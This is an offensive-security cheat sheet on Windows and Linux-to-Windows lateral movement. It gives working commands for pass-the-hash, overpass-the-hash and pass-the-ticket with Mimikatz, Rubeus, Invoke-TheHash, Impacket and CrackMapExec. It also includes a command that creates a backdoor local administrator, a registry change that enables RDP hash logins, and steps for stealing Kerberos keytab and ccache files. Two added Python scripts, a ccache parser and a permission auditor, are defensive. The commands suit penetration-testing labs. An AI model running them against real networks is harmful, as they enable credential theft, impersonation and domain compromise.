Martian Defense NoteBook

Windows Lateral Movement

Pass The Hash (Mimikatz)

mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<hash> /domain:inlanefreight.htb /run:cmd.exe" exit

Pass The Hash (Invoke-TheHash)

# Import Module
Import-Module .\Invoke-TheHash.psd1

# Pass The Hash
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <username> -Hash <hash> -Command "net user 0xF0rk Password123 /add && net localgroup administrators 0xF0rk /add" -Verbose

# With WMI
Invoke-WMIExec -Target DC01 -Domain <domain> -Username <user> -Hash <hash> -Command "powershell -e <base64 command>"

Pass the Hash Impacket (Linux)

impacket-psexec administrator@<IP> -hashes :<hash>

Pass The Hash CrackMapExec (Linux)

crackmapexec smb <IP> -u Administrator -d . -H <hash> --local-auth

Pass The Hash RDP

# Enable Restricted Admin mode (required for PtH over RDP; DisableRestrictedAdmin=0 turns it on)
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

# RDP
xfreerdp /v:<IP> /u:<user> /pth:<hash>

Harvesting Tickets From Windows

# Mimikatz
## Check Privs
privilege::debug

# Show Tickets
sekurlsa::tickets /export
# Rubeus
Rubeus.exe dump /nowrap

Pass the Key or OverPass the Hash

# Mimikatz Extract Keys
privilege::debug
sekurlsa::ekeys

# Mimikatz OverPass the Hash
sekurlsa::pth /domain:inlanefreight.htb /user:<user> /ntlm:<rc4_value>

# Rubeus
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:<aes256_hmac_Value>

Pass the Ticket (PtT)

# Rubeus
## /ptt -> inject the requested ticket into the current session
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:<rc4_value> /ptt

# Import .Kirbi 
Rubeus.exe ptt /ticket:file.kirbi

# Base64 Encode .Kirbi (PowerShell)
[Convert]::ToBase64String([IO.File]::ReadAllBytes("file.kirbi"))

# Import With Base64
Rubeus.exe ptt /ticket:<base64>

Pass The Ticket PowerShell Remoting

# Import Ticket
kerberos::ptt "file.kirbi"

# Enter PC
Enter-PSSession -ComputerName <computername>

Pass The Ticket (From Linux)

Check Whether the Linux Machine Is Domain-Joined

realm list

ps -ef | grep -i "winbind\|sssd"

Find Keytab Files

find / -name "*keytab*" -ls 2>/dev/null

Find ccache Files

A credential cache (ccache) file holds a user's Kerberos credentials (the TGT and any service tickets already obtained) for as long as they remain valid, which in practice is usually the lifetime of the user's session.

env | grep -i krb5
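What such a file actually contains is easier to see by parsing one. The following is an added example, not code from the original notes: a small Python parser for version-4 ccache files, the FILE: format written by MIT krb5, returning the default principal and, per credential, the client, the service principal, the key enctype, the expiry and the ticket flags, which is what an incident responder wants when triaging a cache found on a host (the session key bytes are deliberately not reported). The cache bytes are constructed by build_sample_ccache() for carlos@INLANEFREIGHT.HTB, the principal used in the keytab example below; the key and ticket bytes are placeholders.

```python
"""Read the metadata of a version-4 Kerberos credential cache (the FILE: ccache
format used by MIT krb5).  Added example for triage, not part of the original
notes; the cache bytes are constructed below, not captured from a host."""
import struct
from datetime import datetime, timezone


class Reader:
    """Sequential big-endian reader with bounds checking."""

    def __init__(self, data):
        self.data, self.pos = data, 0

    def take(self, n):
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated ccache")
        self.pos += n
        return chunk

    def u8(self):
        return self.take(1)[0]

    def u16(self):
        return struct.unpack(">H", self.take(2))[0]

    def u32(self):
        return struct.unpack(">I", self.take(4))[0]

    def octets(self):
        # counted_octet_string: uint32 length followed by the bytes
        return self.take(self.u32())

    def principal(self):
        # v4 principal: uint32 name_type, uint32 component count, realm, components
        self.u32()
        count = self.u32()
        realm = self.octets().decode()
        comps = [self.octets().decode() for _ in range(count)]
        return "/".join(comps) + "@" + realm


def parse_ccache(data):
    """Return the default principal and a summary of every cached credential."""
    r = Reader(data)
    if r.u8() != 5 or r.u8() != 4:
        raise ValueError("only ccache format version 4 (0x0504) is handled here")
    r.take(r.u16())  # header block (tag/len/value fields such as DeltaTime); not needed here
    info = {"default_principal": r.principal(), "credentials": []}
    while r.pos < len(data):
        cred = {"client": r.principal(), "server": r.principal()}
        cred["enctype"] = r.u16()  # keyblock: uint16 enctype, then the session key
        r.octets()                 # session key bytes: skipped, never reported
        _auth, _start, end, _renew = [r.u32() for _ in range(4)]  # epoch seconds
        cred["end_time"] = datetime.fromtimestamp(end, timezone.utc)
        r.u8()                     # is_skey
        cred["flags"] = r.u32()    # ticket flags, e.g. 0x40000000 = forwardable
        for _ in range(r.u32()):   # addresses: uint16 type + counted string
            r.u16()
            r.octets()
        for _ in range(r.u32()):   # authorization data: uint16 type + counted string
            r.u16()
            r.octets()
        cred["ticket_len"] = len(r.octets())
        r.octets()                 # second_ticket (empty for normal tickets)
        info["credentials"].append(cred)
    return info


def _octets(b):
    return struct.pack(">I", len(b)) + b


def _principal(name, realm, name_type=1):
    comps = name.split("/")
    return (struct.pack(">II", name_type, len(comps)) + _octets(realm.encode())
            + b"".join(_octets(c.encode()) for c in comps))


def build_sample_ccache():
    """Constructed v4 cache holding one TGT for carlos@INLANEFREIGHT.HTB.
    Key and ticket bytes are placeholders, not real cryptographic material."""
    header = struct.pack(">HHii", 1, 8, 0, 0)  # one header field: tag 1 (DeltaTime) = 0s 0us
    out = bytes([5, 4]) + struct.pack(">H", len(header)) + header
    out += _principal("carlos", "INLANEFREIGHT.HTB")                       # default principal
    out += _principal("carlos", "INLANEFREIGHT.HTB")                       # credential: client
    out += _principal("krbtgt/INLANEFREIGHT.HTB", "INLANEFREIGHT.HTB", 2)  # credential: server
    out += struct.pack(">H", 18) + _octets(b"\x00" * 32)  # enctype 18 (aes256-cts), placeholder key
    out += struct.pack(">IIII", 1700000000, 1700000000, 1700036000, 1700604800)
    out += b"\x00" + struct.pack(">I", 0x40E00000)  # is_skey; forwardable|renewable|initial|pre-authent
    out += struct.pack(">II", 0, 0)                 # no addresses, no authdata
    out += _octets(b"constructed-ticket-bytes") + _octets(b"")
    return out


if __name__ == "__main__":
    for key, value in parse_ccache(build_sample_ccache()).items():
        print(key, value)
```

Pointing parse_ccache at the bytes of a real cache (the path in KRB5CCNAME, or /tmp/krb5cc_<uid>) gives the same information as klist without needing a working Kerberos configuration on the analysis box, which is convenient when the file has been copied off the host for forensics.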

Abusing KeyTab Files

# Klist List Keytab files
klist -k -l

# Impersonate Other User
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab

# Verify 
klist

Keytab Extract

python3 /opt/blackbuntu/keytabextract.py file.keytab

Abusing ccache Files

To abuse a ccache file, all we need is read access to it. By default these files live in /tmp and are readable only by the user who created them, so once we have root we can use any of them.

# Import ccache file
export KRB5CCNAME=<file>
klist

# Able to read DC
smbclient //dc01/C$ -k -c ls --no-pass
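The two preconditions just described (keytabs lying around readable, ccache files exposed to anyone but their owner) are also exactly what a host audit should look for. As an added example that is not part of the original notes, the script below walks a directory tree for keytab and krb5cc_* files and reports those readable by group or others, plus caches whose krb5cc_<uid> name does not match the owning uid (a sign the file was copied or created under another account). The sample tree is constructed in a temporary directory with placeholder contents; point audit_kerberos_files() at / on a real host.

```python
"""Audit a directory tree for Kerberos keytab and credential-cache files that
are exposed to more than their owner.  Added defender-side example, not part
of the original notes; the sample tree is constructed in a temp directory."""
import re
import stat
import tempfile
from pathlib import Path

KEYTAB_RE = re.compile(r"keytab", re.IGNORECASE)
# MIT krb5 default FILE cache name: krb5cc_<uid>, optionally with a suffix
CCACHE_RE = re.compile(r"^krb5cc_(\d+)(_\w+)?$")


def classify(path):
    """Return "ccache", "keytab" or None for a path."""
    if CCACHE_RE.match(path.name):
        return "ccache"
    if KEYTAB_RE.search(path.name):
        return "keytab"
    return None


def audit_kerberos_files(root):
    """Return a list of findings, one dict per problematic file."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        kind = classify(path)
        if kind is None:
            continue
        st = path.stat()
        mode = stat.S_IMODE(st.st_mode)
        problems = []
        if mode & (stat.S_IRGRP | stat.S_IROTH):
            problems.append("readable by group/others (mode %o)" % mode)
        m = CCACHE_RE.match(path.name)
        if m and int(m.group(1)) != st.st_uid:
            problems.append("name says uid %s but file is owned by uid %d"
                            % (m.group(1), st.st_uid))
        if problems:
            findings.append({"path": str(path), "name": path.name,
                             "kind": kind, "problems": problems})
    return findings


def build_sample_tree():
    """Constructed sample: a well-protected system keytab and user cache next to
    a world-readable keytab and a group-readable cache.  Contents are placeholders."""
    root = Path(tempfile.mkdtemp(prefix="krb-audit-"))
    for sub in ("etc", "tmp", "opt"):
        (root / sub).mkdir()
    samples = {
        "etc/krb5.keytab": 0o600,    # fine
        "opt/carlos.keytab": 0o644,  # exposed
        "tmp/krb5cc_1000": 0o600,    # fine (unless the owner is not uid 1000)
        "tmp/krb5cc_1001": 0o640,    # exposed to the group
        "tmp/notes.txt": 0o644,      # not a Kerberos file, ignored
    }
    for rel, mode in samples.items():
        p = root / rel
        p.write_bytes(b"constructed placeholder, not a real keytab or ticket")
        p.chmod(mode)
    return root


if __name__ == "__main__":
    for f in audit_kerberos_files(build_sample_tree()):
        print(f["kind"], f["path"], "; ".join(f["problems"]))
```

Run as root on a real host the walk covers the whole filesystem, so restrict it to / and expect false positives from package-owned test fixtures; the actionable findings are keytabs outside /etc with loose modes and caches in /tmp that other local users can read.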

Convert ccache file for Windows

https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py


Last updated 5 months ago